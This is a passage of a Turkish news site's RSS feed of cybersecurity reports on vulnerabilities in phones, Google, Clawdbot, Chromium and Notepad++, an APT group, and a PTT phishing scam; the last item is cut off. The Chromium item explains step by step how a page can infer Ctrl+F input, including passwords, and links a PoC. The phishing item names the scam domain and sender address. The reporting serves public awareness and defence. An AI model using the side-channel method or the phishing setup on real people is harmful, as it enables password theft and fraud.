<content:encoded><![CDATA[<p>Grandstream GXP1600 IP telefonlarında kritik bir güvenlik açığı ortaya çıktı. CVE-2026-2329 olarak takip edilen zafiyet, stack-based buffer overflow (yığın tabanlı bellek taşması) türünde ve cihazda herhangi bir kimlik doğrulama gerektirmeden uzaktan kötü amaçlı kod çalıştırılmasına olanak sağlıyor.</p>
<p data-start="721" data-end="770"><strong data-start="721" data-end="768">Uzmanlar, açığın etkilerini şöyle özetledi:</strong></p>
<ul data-start="771" data-end="1149">
<li data-start="771" data-end="859">
<p data-start="773" data-end="859">Saldırganlar SIP kimlik bilgilerini ve yerel cihaz hesap verilerini elde edebiliyor.</p>
</li>
<li data-start="860" data-end="982">
<p data-start="862" data-end="982">Cihazın SIP ayarlarını yeniden yapılandırabiliyor ve çağrıları kötü niyetli bir SIP proxy üzerinden yönlendirebiliyor.</p>
</li>
<li data-start="983" data-end="1149">
<p data-start="985" data-end="1149">Telefon normal şekilde çalmaya devam ediyor, kullanıcılar herhangi bir anormallik fark etmiyor, fakat tüm görüşmeler saldırganın kontrolündeki altyapıdan geçiyor.</p>
</li>
</ul>
<p data-start="1151" data-end="1283">Açığın hedef kitlesi arasında küçük ve orta ölçekli işletmeler, hukuk firmaları, satış ekipleri ve finans departmanları bulunuyor.</p>
<p data-start="1285" data-end="1540">Grandstream, güvenlik açığını Ocak ayında sorumlu bir şekilde bildirdi. Firma, kullanıcıları uyarmak ve cihazlarını korumak amacıyla 1.0.7.81 sürümlü güvenlik güncellemesini yayımladı. Güncelleme cihazların güvenliğini sağlamak için kritik önem taşıyor.</p>
<p data-start="1542" data-end="1720"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Güvenlik Açığı Raporu: YouTube Üzerinden Kullanıcı Verilerine Erişim Riski Ortaya Çıktı</title>
<link>https://www.ajansexpres.com.tr/google-guvenlik-acigi-raporu-youtube-uzerinden-kullanici-verilerine-erisim-riski-ortaya-cikti</link>
<guid>https://www.ajansexpres.com.tr/google-guvenlik-acigi-raporu-youtube-uzerinden-kullanici-verilerine-erisim-riski-ortaya-cikti</guid>
<description><![CDATA[ 2025 yılında yayımlanan bir güvenlik araştırması, YouTube ve bazı Google servisleri arasında oluşan bir zincirleme zafiyetin kullanıcı hesaplarına ait bazı bilgilerin açığa çıkmasına neden olabileceğini ortaya koydu. Araştırmacılar, söz konusu açığın sorumlu bildirim süreciyle Google’a iletildiğini ve şirketin gerekli yamaları uyguladığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_699895c949f01.webp" length="48372" type="image/jpeg"/>
<pubDate>Fri, 20 Feb 2026 20:12:30 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>youtube güvenlik açığı nedir, google gaia id ne işe yarar, siber güvenlik açıkları nasıl bildirilir, google bug bounty ödülü ne kadar</media:keywords>
<content:encoded><![CDATA[<p>Bir güvenlik araştırmacısı tarafından yayımlanan teknik raporda, <strong data-start="548" data-end="640">YouTube ve Google altyapısındaki bazı sistemler arasında veri akışına ilişkin zafiyetler</strong> tespit edildiği bildirildi. Araştırmada, özellikle kullanıcılar arası etkileşim mekanizmalarının, beklenmeyen biçimde bazı dahili kimlik bilgilerinin açığa çıkmasına yol açabildiği ifade edildi.</p>
<p data-start="837" data-end="1198"><strong data-start="837" data-end="886">“Dahili Kimlik Bilgileri Açığa Çıkabiliyordu”</strong><br data-start="886" data-end="889">Araştırmacı, YouTube üzerindeki belirli işlemler sırasında <strong data-start="948" data-end="1043">Google hesaplarına ait “Gaia ID” olarak bilinen dahili tanımlayıcıların elde edilebildiğini</strong> belirtti. Raporda, bu kimliklerin tek başına doğrudan hassas veri içermediği ancak farklı servislerle birleştirildiğinde risk oluşturabileceği vurgulandı.</p>
<p data-start="1200" data-end="1610"><strong data-start="1200" data-end="1247">Farklı Servisler Arasındaki Zincirleme Etki</strong><br data-start="1247" data-end="1250">Çalışmada, Google’ın farklı ürünleri arasında yer alan veri paylaşım mekanizmalarının, belirli senaryolarda <strong data-start="1358" data-end="1407">beklenmeyen veri eşleşmelerine yol açabildiği</strong> ifade edildi. Araştırmacı, “Farklı sistemlerin birlikte değerlendirilmesi, tek başına kritik görünmeyen açıkların birleşerek daha büyük bir riske dönüşmesine neden olabilir.” değerlendirmesinde bulundu.</p>
<p data-start="1612" data-end="1905"><strong data-start="1612" data-end="1649">Sorumlu Bildirim Süreci İşletildi</strong><br data-start="1649" data-end="1652">Araştırmanın 2024 yılı Eylül ayında Google’a iletildiği, şirketin kısa sürede durumu incelemeye aldığı aktarıldı. Güvenlik paneli tarafından yapılan değerlendirmede açığın <strong data-start="1824" data-end="1891">yüksek etkili ancak belirli bir teknik karmaşıklık gerektirdiği</strong> ifade edildi.</p>
<p data-start="1907" data-end="2131">Google yetkililerinin, bildirimin ardından ilgili sistemlerde güncellemeler yaptığı ve <strong data-start="1994" data-end="2033">tespit edilen açıkların kapatıldığı</strong> bildirildi. Sürecin tamamlanmasının ardından rapor, 2025 yılı Şubat ayında kamuoyuyla paylaşıldı.</p>
<p data-start="2133" data-end="2483"><strong data-start="2133" data-end="2165">Ödül ve Değerlendirme Süreci</strong><br data-start="2165" data-end="2168">Güvenlik açığını bildiren araştırmacıya, Google’ın hata ödül programı kapsamında toplamda <strong data-start="2258" data-end="2300">10 bin doların üzerinde ödül verildiği</strong> açıklandı. Panel değerlendirmesinde, açığın “yüksek etki” kategorisinde olduğu ancak belirli bir saldırı zinciri gerektirdiği için derecelendirmede bir kademe düşürüldüğü kaydedildi.</p>
<p data-start="2485" data-end="2813"><strong data-start="2485" data-end="2506">Uzmanlardan Uyarı</strong><br data-start="2506" data-end="2509">Siber güvenlik uzmanları, bu tür olayların <strong data-start="2552" data-end="2657">büyük teknoloji platformlarında bile sistemler arası etkileşimlerin dikkatle denetlenmesi gerektiğini</strong> ortaya koyduğunu belirtti. Uzmanlar, kullanıcıların da hesap güvenliği için iki faktörlü doğrulama gibi önlemleri aktif kullanmasının önemine dikkat çekti.</p>
<p><iframe width="864" height="486" src="https://www.youtube.com/embed/nuZiiKVej84" title="Leaking the email address of any YouTube user ($10k bounty)" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"></iframe></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber Güvenlik Uzmanı Onur Oktay: “TGR&#45;STA&#45;1030 adlı APT grubu Türkiye’yi aktif keşif faaliyetleriyle hedef aldı”</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-onur-oktay-tgr-sta-1030-adli-apt-grubu-turkiyeyi-aktif-kesif-faaliyetleriyle-hedef-aldi</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-onur-oktay-tgr-sta-1030-adli-apt-grubu-turkiyeyi-aktif-kesif-faaliyetleriyle-hedef-aldi</guid>
<description><![CDATA[ Siber Güvenlik Uzmanı Onur Oktay, son bir yıl içinde 37 ülkede en az 70 hükümet kurumu ve kritik altyapıya sızan TGR-STA-1030 (UNC6619) adlı APT grubuna ilişkin değerlendirmelerini paylaştı. Oktay, grubun Türkiye’yi de kapsayan geniş ölçekli keşif faaliyetleri yürüttüğünü, saldırıların stratejik ve ekonomik casusluk amacı taşıdığını vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_6988bfef6f6ef.webp" length="42878" type="image/jpeg"/>
<pubDate>Sun, 08 Feb 2026 19:56:09 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>onur oktay apt değerlendirmesi, tgr sta 1030 türkiye hedef alındı mı, unc6619 shadowguard rootkit nedir, türkiye siber casusluk tehditleri</media:keywords>
<content:encoded><![CDATA[<p><br>Siber Güvenlik Uzmanı <strong data-start="530" data-end="544">Onur Oktay</strong>, son dönemin en gelişmiş tehdit aktörlerinden biri olarak gösterilen <strong data-start="614" data-end="640">TGR-STA-1030 (UNC6619)</strong> adlı APT grubuna ilişkin dikkat çekici bilgiler paylaştı. Oktay, grubun son bir yıl içinde <strong data-start="732" data-end="818">37 ülkede en az 70 hükümet kuruluşu ve kritik altyapı tesisine sızmayı başardığını</strong> belirtti.</p>
<p></p>
<p data-start="830" data-end="1161"><strong data-start="830" data-end="860">Stratejik Kurumlar Hedefte</strong><br>Onur Oktay, grubun saldırı profilinin özellikle <strong data-start="909" data-end="971">Savunma, Dışişleri, Maliye, Ticaret ve Enerji bakanlıkları</strong> üzerinde yoğunlaştığını ifade ederek, “Parlamentolar, emniyet teşkilatları, sınır kontrol birimleri ve ulusal telekomünikasyon şirketleri de hedef alınan yapılar arasında yer alıyor.” dedi.</p>
<p data-start="1163" data-end="1594"><strong data-start="1163" data-end="1210">Aktif Keşif ve Ülkeye Özel Saldırı Planları</strong><br>Grubu diğer APT yapılanmalarından ayıran iki temel noktaya dikkat çeken Oktay, “Bu yapı sadece sızmakla yetinmiyor, ülkelerin kritik altyapılarına yönelik <strong data-start="1366" data-end="1416">aktif keşif ve istihbarat toplama faaliyetleri</strong> yürütüyor.” ifadelerini kullandı. Oktay, her ülke ve sisteme özel saldırı senaryoları oluşturulmasının, kalıcı bir tespit mekanizması geliştirilmesini zorlaştırdığını vurguladı.</p>
<p data-start="1596" data-end="1965"><strong data-start="1596" data-end="1640">ShadowGuard Rootkit ve Yaygın Zafiyetler</strong><br>Saldırılarda kullanılan yöntemlere de değinen Oktay, “Grup, daha önce belgelenmemiş <strong data-start="1725" data-end="1740">ShadowGuard</strong> adlı bir Linux rootkit’i kullanarak sistemlerde uzun süre fark edilmeden kalabiliyor.” dedi. Microsoft Exchange, SAP ve Atlassian ürünlerindeki yamalanmamış veya keşfedilmemiş açıkların da sıkça istismar edildiğini kaydetti.</p>
<p data-start="1967" data-end="2204"><strong data-start="1967" data-end="1993">Çin Bağlantısı İddiası</strong><br>Grubun faaliyet zamanlarının <strong data-start="2023" data-end="2044">GMT+8 saat dilimi</strong> ile örtüştüğünü belirten Onur Oktay, “Bu durum, grubun Çin istihbaratı ile bağlantılı olabileceği yönündeki değerlendirmeleri güçlendiriyor.” şeklinde konuştu.</p>
<p data-start="2206" data-end="2627"><strong data-start="2206" data-end="2228">Türkiye De Hedefte</strong><br>Türkiye’ye yönelik tehdit boyutuna ilişkin değerlendirmesinde Oktay, “Unit42 raporlarına göre grup, <strong data-start="2329" data-end="2452">Kasım-Aralık 2025 döneminde Türkiye dahil birçok ülkenin hükümet altyapılarına yönelik aktif keşif faaliyetleri yürüttü</strong>.” ifadelerini kullandı. Türkiye’nin doğrudan sızma yapılan 37 ülke arasında ismen yer almadığını, ancak geniş kapsamlı tarama operasyonlarının menzilinde bulunduğunu söyledi.</p>
<p data-start="2629" data-end="3110"><strong data-start="2629" data-end="2663">Davranışsal Tespit Öne Çıkıyor</strong><br>IOC bilgilerinin sınırlı olduğuna dikkat çeken Oktay, “Her saldırı farklı yöntemlerle gerçekleştirildiği için elde edilmiş kritik IOC setleri yok. Ancak ShadowGuard rootkit’inin davranışsal izleri üzerinden tespit çalışmaları yapılabiliyor.” dedi. Web shell olarak <strong data-start="2929" data-end="2966">Behinder, Godzilla ve Neo-reGeorg</strong> varyantlarının kullanıldığını, C2 trafiğinde Cloudflare arkasına gizlenmiş alan adları ile popüler VPS servislerinin tercih edildiğini aktardı.</p>
<p data-start="3112" data-end="3461"><strong data-start="3112" data-end="3146">Exchange Sunucuları İçin Uyarı</strong><br>Onur Oktay, “Türkiye dahil birçok ülkede Exchange sunucuları hedef alındı. Bu nedenle <strong data-start="3233" data-end="3305">owa/auth dizinleri altında .aspx ve .ashx dosyalarının oluşturulması</strong> yakından incelenmeli.” uyarısında bulundu. Ayrıca sahte Googlebot gibi <strong data-start="3377" data-end="3403">alışılmadık User-Agent</strong> değerlerinin C2 trafiğinde sıkça kullanıldığını belirtti.</p>
<p data-start="3463" data-end="3616"><strong data-start="3463" data-end="3475"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Tek Tıkla Bilgisayar Ele Geçiriliyor: Moltbot Clawdbot Açığı Siber Güvenlikte Alarm Zillerini Çaldırdı</title>
<link>https://www.ajansexpres.com.tr/tek-tikla-bilgisayar-ele-geciriliyor-moltbot-clawdbot-acigi-siber-guvenlikte-alarm-zillerini-caldirdi</link>
<guid>https://www.ajansexpres.com.tr/tek-tikla-bilgisayar-ele-geciriliyor-moltbot-clawdbot-acigi-siber-guvenlikte-alarm-zillerini-caldirdi</guid>
<description><![CDATA[ Moltbot olarak bilinen Clawdbot altyapısında ortaya çıkarılan kritik güvenlik açığı, kullanıcıların yalnızca zararlı bir bağlantıya tıklamasıyla sistemlerinde uzaktan kod çalıştırılmasına yol açıyor. CVE-2026-25253 koduyla kayda geçen açık, dosya indirme gerektirmemesi ve hiçbir uyarı üretmemesi nedeniyle ciddi risk oluşturuyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_6988a36162a4c.webp" length="43640" type="image/jpeg"/>
<pubDate>Sun, 08 Feb 2026 17:53:46 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>moltbot clawdbot tek tık açığı, cve-2026-25253 güvenlik riski, uzaktan kod çalıştırma nasıl oluyor, yapay zeka siber güvenlik keşfi</media:keywords>
<content:encoded><![CDATA[<p><br>Moltbot ya da yaygın adıyla <strong data-start="510" data-end="522">Clawdbot</strong> üzerinde tespit edilen kritik bir güvenlik açığının, kullanıcı etkileşimi sonrasında doğrudan <strong data-start="617" data-end="643">uzaktan kod çalıştırma</strong> imkânı sağladığı bildirildi. Açık, <strong data-start="679" data-end="697">CVE-2026-25253</strong> numarasıyla kayıt altına alındı.</p>
<p></p>
<p data-start="732" data-end="1036">Güvenlik açığının, uygulamada kullanılan <strong data-start="773" data-end="814">güvensiz nesne serileştirme süreçleri</strong> ile birlikte <strong data-start="828" data-end="880">etkili bir sandbox izolasyonunun bulunmamasından</strong> kaynaklandığı belirtildi. Bu durumun, saldırganların tek bir bağlantı üzerinden hedef sistemde keyfi komutlar çalıştırabilmesine olanak tanıdığı aktarıldı.</p>
<p data-start="1038" data-end="1365"><strong data-start="1038" data-end="1085">Hiçbir Şey İndirmeden, Hiçbir Uyarı Almadan</strong><br>Uzmanlar, açığın istismarı için <strong data-start="1118" data-end="1158">dosya indirilmesine gerek olmadığını</strong>, <strong data-start="1160" data-end="1212">çok aşamalı bir exploit zinciri kullanılmadığını</strong> ve kullanıcıya <strong data-start="1228" data-end="1278">herhangi bir güvenlik uyarısı gösterilmediğini</strong> vurguladı. Bağlantıya tıklanmasının ardından kodun doğrudan çalıştırıldığı kaydedildi.</p>
<p data-start="1367" data-end="1723"><strong data-start="1367" data-end="1404">Yapay Zekâ İki Saatte Tespit Etti</strong><br>Zafiyetin dikkat çeken yönlerinden biri de keşif süreci oldu. Açığın, <strong data-start="1475" data-end="1506">otonom bir yapay zekâ ajanı</strong> tarafından uçtan uca analiz edilerek doğrulandığı, sürecin iki saatten kısa sürdüğü ifade edildi. Bu gelişmenin, yapay zekânın siber güvenlik alanındaki etkinliğine dair yeni bir dönemi işaret ettiği değerlendirildi.</p>
<p data-start="1725" data-end="1925">Yetkililer, Moltbot/Clawdbot ile bağlantılı sistemleri kullanan kurum ve bireylerin ağ trafiğini incelemesi, ilgili bileşenleri izole etmesi ve olası saldırı izlerini araştırması gerektiğini belirtti.</p>
<p data-start="1927" data-end="2073"><strong data-start="1927" data-end="1939"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Ctrl F ile Parolanız Okunabilir mi Chromium Tarayıcılarda hidden until found Detayı Güvenlik Alarmı Veriyor</title>
<link>https://www.ajansexpres.com.tr/ctrl-f-ile-parolaniz-okunabilir-mi-chromium-tarayicilarda-hidden-until-found-detayi-guvenlik-alarmi-veriyor</link>
<guid>https://www.ajansexpres.com.tr/ctrl-f-ile-parolaniz-okunabilir-mi-chromium-tarayicilarda-hidden-until-found-detayi-guvenlik-alarmi-veriyor</guid>
<description><![CDATA[ Chrome, Edge ve Brave gibi Chromium tabanlı tarayıcılarda yer alan hidden=&quot;until-found&quot; özelliği, Ctrl+F ile yapılan sayfa içi aramaların izole olduğu algısını sarsıyor. beforematch olayı üzerinden kullanıcı girdilerinin dolaylı biçimde çözümlenebildiği teknik analiz, parola sızıntı siteleri açısından dikkat çeken riskler barındırıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_698725548bebb.webp" length="42020" type="image/jpeg"/>
<pubDate>Sat, 07 Feb 2026 14:58:02 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>ctrl f parola okunur mu, hidden until found güvenlik açığı, ebubekir bastama ctrl f poc, chromium tarayıcı gizlilik riski</media:keywords>
<content:encoded><![CDATA[<p>Chromium tabanlı tarayıcılarda erişilebilirlik ve kullanıcı deneyimi amacıyla geliştirilen <strong data-start="573" data-end="597">hidden="until-found"</strong> niteliğinin, sayfa içi arama sırasında beklenmedik bir <strong data-start="653" data-end="681">yan kanal güvenlik riski</strong> oluşturabildiği ortaya kondu. Uzman analizlere göre, kullanıcıların <strong data-start="750" data-end="760">Ctrl+F</strong> ile yaptığı aramaların tamamen istemci tarafında ve web sayfası tarafından gözlemlenemez olduğu yönündeki yaygın varsayım bu özellikle birlikte geçerliliğini yitiriyor.</p>
<p></p>
<p data-start="931" data-end="1326"><strong data-start="931" data-end="974">Ctrl F Yapıldığında DOM Sessiz Kalmıyor</strong><br>hidden="until-found" ile gizlenen içerikler normal şartlarda görünmez durumda kalıyor. Ancak sayfa içi arama sırasında eşleşme oluştuğunda, tarayıcı bu elementleri geçici olarak görünür hâle getiriyor. Bu aşamada tetiklenen <strong data-start="1199" data-end="1214">beforematch</strong> adlı DOM olayı, JavaScript tarafından dinlenebiliyor ve kullanıcı aramasına dair dolaylı bilgiler üretebiliyor.</p>
<p data-start="1328" data-end="1809"><strong data-start="1328" data-end="1370">Karakter Karakter Çözümlenebilen Arama</strong><br>Teknik incelemede, sayfaya eklenen binlerce gizli HTML elementinin olası karakter dizilerini temsil ettiği belirtiliyor. Kullanıcı Ctrl+F alanına bir karakter yazdığında, yalnızca eşleşen element için beforematch olayı tetikleniyor. Bu zincirleme yapı sayesinde, klavye dinlemesi yapılmadan kullanıcının arama girdisinin <strong data-start="1692" data-end="1725">adım adım tahmin edilebildiği</strong> ifade ediliyor. Bu yöntem, klasik anlamda bir <strong data-start="1772" data-end="1788">side‑channel</strong> olarak tanımlanıyor.</p>
<p data-start="1811" data-end="2319"><strong data-start="1811" data-end="1858">Parola Sızıntı Siteleri İçin Kritik Senaryo</strong><br>Uzmanlar, bu tekniğin özellikle <strong data-start="1891" data-end="1920">“parolanız sızdırıldı mı”</strong> iddiasıyla hizmet veren siteler açısından ciddi bir risk barındırdığına dikkat çekiyor. Kullanıcının mevcut parolasını bu tür sitelere yazması hâlinde, sayfa içinde yer alan hidden="until-found" elementleri aracılığıyla parolanın <strong data-start="2151" data-end="2188">kısmen bile olsa sızdırılabilmesi</strong> teorik olarak mümkün görülüyor. Bu durum, kullanıcı parolayı kendi rızasıyla girmiş olsa bile ek bir gizlilik tehdidi oluşturuyor.</p>
<p data-start="2321" data-end="2851"><strong data-start="2321" data-end="2366">Teknik Çalışmanın Kaynağı ve Türkçe Yayın</strong><br>Söz konusu riskin pratikte nasıl çalıştığı, uluslararası güvenlik araştırmaları kapsamında daha önce ortaya konulan teknik bir yöntem üzerinden gösteriliyor. Bu çalışmayı derleyerek Türkçeleştiren ve kamuoyuna haberleştiren isim ise siber güvenlik araştırmacısı <strong data-start="2629" data-end="2649">Ebubekir Bastama</strong> oldu. Bastama’nın internet sitesinde yayımlanan içerikte, hidden="until-found" ve beforematch kombinasyonunun Ctrl+F girdilerini nasıl dolaylı biçimde açığa çıkarabildiği ayrıntılı şekilde aktarılıyor.</p>
<p data-start="2853" data-end="3170"><strong data-start="2853" data-end="2883">Test Edilebilen PoC Adresi</strong><br>Yayımlanan çalışmada, yöntemin teorik anlatımla sınırlı kalmadığına dikkat çekiliyor. Kullanıcılar ve geliştiriciler, ilgili davranışı doğrudan test edebilmek için hazırlanan PoC’ye şu adres üzerinden erişebiliyor: <a data-start="3099" data-end="3170" rel="noopener" target="_new" class="decorated-link" href="https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html">https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html<span aria-hidden="true" class="ms-0.5 inline-block align-middle leading-none"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" aria-hidden="true" data-rtl-flip="" class="block h-[0.75em] w-[0.75em] stroke-current stroke-[0.75]"><use href="https://www.ajansexpres.com.tr/cdn/assets/sprites-core-j9921kii.svg#304883" fill="currentColor"></use></svg></span></a></p>
<p data-start="3172" data-end="3485"><strong data-start="3172" data-end="3201">Boşluklar Bile Atlanmıyor</strong><br>Analizde, Ctrl+F indekslemesinde boşluk karakterlerinin tek başına algılanmaması nedeniyle <strong data-start="3293" data-end="3322">Zero‑Width Space (\u200B)</strong> gibi görünmez karakterlerin kullanıldığı aktarılıyor. Bu sayede, boşluk içeren kelime ve parola dizilerinin de tarayıcı tarafından indekslenebildiği belirtiliyor.</p>
<p data-start="3487" data-end="3988"><strong data-start="3487" data-end="3534">Hızlı Yazımda Özellikle PC’lerde Çalışmıyor</strong><br>Çalışmada özellikle masaüstü bilgisayarlara vurgu yapılıyor. Ctrl+F alanına karakterlerin <strong data-start="3625" data-end="3648">çok hızlı yazılması</strong> veya metnin yapıştırılması durumunda, tarayıcıların performans optimizasyonları nedeniyle bazı DOM taramalarını atladığı belirtiliyor. Bu senaryolarda beforematch olayının tetiklenmediği ve algılamanın çalışmadığı ifade ediliyor. Uzmanlar, bunun JavaScript kaynaklı bir hata değil, bilinçli bir tarayıcı davranışı olduğunun altını çiziyor.</p>
<p data-start="3990" data-end="4433"><strong data-start="3990" data-end="4029">Tarayıcı Güvenliği Yeniden Gündemde</strong><br>Uzman görüşlerinde, beforematch olayının JavaScript erişimine kapatılması, hidden="until-found" elementlerinin gözlemlenemez hâle getirilmesi ya da Ctrl+F indekslemesinin DOM olayı üretmeden çalışması gibi önlemlerin değerlendirilmesi gerektiği belirtiliyor. Kullanıcı deneyimi için eklenen her yeni tarayıcı özelliğinin, gizlilik ve veri güvenliği açısından yeniden ele alınması gerektiği vurgulanıyor.</p>
<p data-start="4435" data-end="4567"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>PTT Adıyla Gönderilen Bu Maili Açan Yandı Gümrük Vergisi Tuzağıyla Kart Bilgileri Ele Geçiriliyor</title>
<link>https://www.ajansexpres.com.tr/ptt-adiyla-goenderilen-bu-maili-acan-yandi-gumruk-vergisi-tuzagiyla-kart-bilgileri-ele-geciriliyor</link>
<guid>https://www.ajansexpres.com.tr/ptt-adiyla-goenderilen-bu-maili-acan-yandi-gumruk-vergisi-tuzagiyla-kart-bilgileri-ele-geciriliyor</guid>
<description><![CDATA[ PTT ismi kullanılarak gönderilen “Gönderiniz için gümrük vergisi ödemesi gerekmektedir” başlıklı sahte e-postalarda yeni bir detay daha ortaya çıktı. Vatandaşları ödeme yapmaya yönlendiren maildeki butonun, yurt dışı kaynaklı şüpheli bir bağlantıya yönlendirdiği tespit edildi. Uzmanlar, linke tıklayanların ciddi maddi kayıp riskiyle karşı karşıya kaldığını belirtiyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_698349fa406eb.webp" length="66786" type="image/jpeg"/>
<pubDate>Wed, 04 Feb 2026 16:31:29 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>ptt sahte gümrük vergisi maili, ptt dolandırıcılık linki, gümrük vergisi phishing saldırısı, constant contact sahte ptt maili</media:keywords>
<content:encoded><![CDATA[<p>PTT adı ve logosu kullanılarak hazırlanan sahte e-postalarla vatandaşların dolandırılmaya çalışıldığı belirlendi. “Gümrük Vergisi Ödeme Bildirimi” başlığıyla gönderilen mesajlarda, gönderinin PTT gönderi merkezinde olduğu ve 150 TL ödeme yapılmaması halinde teslimatın durdurulacağı iddia ediliyor.</p>
<p></p>
<p data-start="805" data-end="1188"><strong data-start="805" data-end="841">Şüpheli Link Detayı Ortaya Çıktı</strong><br>Sahte e-postada yer alan “Ödemeyi Tamamla” butonuna tıklayan kullanıcıların, <strong data-start="919" data-end="943">i6ome8hbb.cc.rs6.net</strong> uzantılı, PTT ile hiçbir bağlantısı bulunmayan bir adrese yönlendirildiği tespit edildi. Bağlantının, Constant Contact altyapısı üzerinden gizlenmiş şekilde sunulduğu ve kullanıcıyı sahte ödeme sayfasına yönlendirmeyi amaçladığı ifade ediliyor.</p>
<p data-start="1190" data-end="1558"><strong data-start="1190" data-end="1235">Yurt Dışı Kaynaklı Adresler Alarm Veriyor</strong><br>E-postanın gönderici adresinde “<a data-start="1268" data-end="1307" class="decorated-link cursor-pointer" rel="noopener">info-santedicola.com@shared1.ccsend.com<span aria-hidden="true" class="ms-0.5 inline-block align-middle leading-none"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" aria-hidden="true" data-rtl-flip="" class="block h-[0.75em] w-[0.75em] stroke-current stroke-[0.75]"><use href="https://www.ajansexpres.com.tr/cdn/assets/sprites-core-c9exbsc1.svg#304883" fill="currentColor"></use></svg></span></a>” ibaresinin yer aldığı, mesajın alt bölümünde ise ABD’ye ait açık adres bilgilerinin bulunduğu görüldü. Siber güvenlik uzmanları, bu tür <strong data-start="1445" data-end="1500">yurt dışı kaynaklı ve kurumsal görünümlü adreslerin</strong>, oltalama saldırılarında sıkça kullanıldığını vurguluyor.</p>
<p data-start="1560" data-end="1851"><strong data-start="1560" data-end="1599">Amaç Kredi Kartı ve Kişisel Veriler</strong><br>Uzmanlara göre sahte bağlantı üzerinden açılan sayfalarda kredi kartı bilgileri, kimlik verileri ve banka bilgileri hedef alınıyor. Girilen bilgilerin anlık olarak dolandırıcıların eline geçtiği ve kartlardan izinsiz harcamalar yapıldığı bildiriliyor.</p>
<p data-start="1853" data-end="2193"><strong data-start="1853" data-end="1891">PTT’nin Uygulamalarıyla Örtüşmüyor</strong><br>PTT’nin resmî uygulamalarında gümrük vergisi bildirimlerinin e-posta yoluyla ve üçüncü taraf bağlantılar üzerinden yapılmadığı belirtiliyor. Kurumun, ödemelerin yalnızca <strong data-start="2062" data-end="2113">resmî internet sitesi, e-Devlet ve PTT şubeleri</strong> aracılığıyla gerçekleştirildiğini daha önce kamuoyuna duyurduğu hatırlatılıyor.</p>
<p data-start="2195" data-end="2460"><strong data-start="2195" data-end="2228">Yetkililerden Vatandaşa Uyarı</strong><br>Siber güvenlik uzmanları, bu tür e-postaların kesinlikle açılmaması, bağlantılara tıklanmaması ve ödeme bilgisi girilmemesi gerektiğini vurguluyor. Şüpheli mesajların BTK ve ilgili resmi platformlara bildirilmesi çağrısı yapılıyor.</p>
<p data-start="2462" data-end="2598"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Siber güvenlik uzmanı Onur Oktay: “Notepad++ güncelleme zinciri APT saldırısıyla ele geçirildi”</title>
<link>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-onur-oktay-notepad-guncelleme-zinciri-apt-saldirisiyla-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/siber-guvenlik-uzmani-onur-oktay-notepad-guncelleme-zinciri-apt-saldirisiyla-ele-gecirildi</guid>
<description><![CDATA[ Popüler kod editörü Notepad++’ın güncelleme altyapısının, Çin devlet destekli olduğu değerlendirilen bir APT grubu tarafından hedef alındığı ortaya çıktı. Haziran 2025 ile 2 Aralık 2025 tarihleri arasında gerçekleştiği belirtilen saldırıda, kullanıcıların güncelleme trafiğinin saldırgan kontrolündeki sunuculara yönlendirildiği ve sahte güncelleme paketlerinin dağıtıldığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_698137c52eb3a.webp" length="49988" type="image/jpeg"/>
<pubDate>Tue, 03 Feb 2026 02:48:29 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>notepad++ supply chain saldırısı, notepad++ güncelleme güvenliği, wingup zafiyeti nedir, apt grubu notepad++ saldırısı</media:keywords>
<content:encoded><![CDATA[<p>Siber güvenlik uzmanı <strong data-start="552" data-end="566">Onur Oktay</strong>, Notepad++ uygulamasına yönelik ciddi bir <strong data-start="609" data-end="638">supply chain saldırısının</strong> ayrıntılarını kamuoyuyla paylaştı. Oktay, saldırının doğrudan Notepad++’ın kendi sunucularına değil, uygulamanın barındırıldığı <strong data-start="767" data-end="805">hosting sağlayıcısının altyapısına</strong> yönelik gerçekleştirildiğini açıkladı.</p>
<p data-start="846" data-end="1249"><strong data-start="846" data-end="900">Güncelleme Trafiği Saldırganların Kontrolüne Geçti</strong><br>Paylaşılan bilgilere göre, Haziran 2025 ile 2 Aralık 2025 tarihleri arasında Notepad++’ın güncelleme mekanizması olan <strong data-start="1019" data-end="1029">WinGUp</strong> üzerinden gerçekleşen trafik, saldırganlar tarafından kontrol edilen sunuculara yönlendirildi. Bu süreçte, kullanıcılara resmi güncelleme izlenimi veren <strong data-start="1183" data-end="1224">zararlı yazılım içeren sahte paketler</strong> gönderildiği belirtildi.</p>
